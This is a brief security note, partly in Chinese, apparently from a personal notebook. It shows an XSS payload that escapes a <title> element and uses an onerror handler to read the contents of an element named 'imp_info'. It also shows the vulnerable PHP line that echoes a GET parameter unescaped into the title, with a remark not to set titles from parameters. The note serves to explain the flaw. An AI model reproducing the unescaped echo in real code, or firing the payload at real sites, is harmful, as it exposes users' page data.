Sensitive information

param=<img src="</title><img src=x onerror=alert(document.getElementById('imp_info').innerHTML)//"\>

不要传参设置title

<title><?php echo $_GET['param'];?></title>

title的解析高优先级造成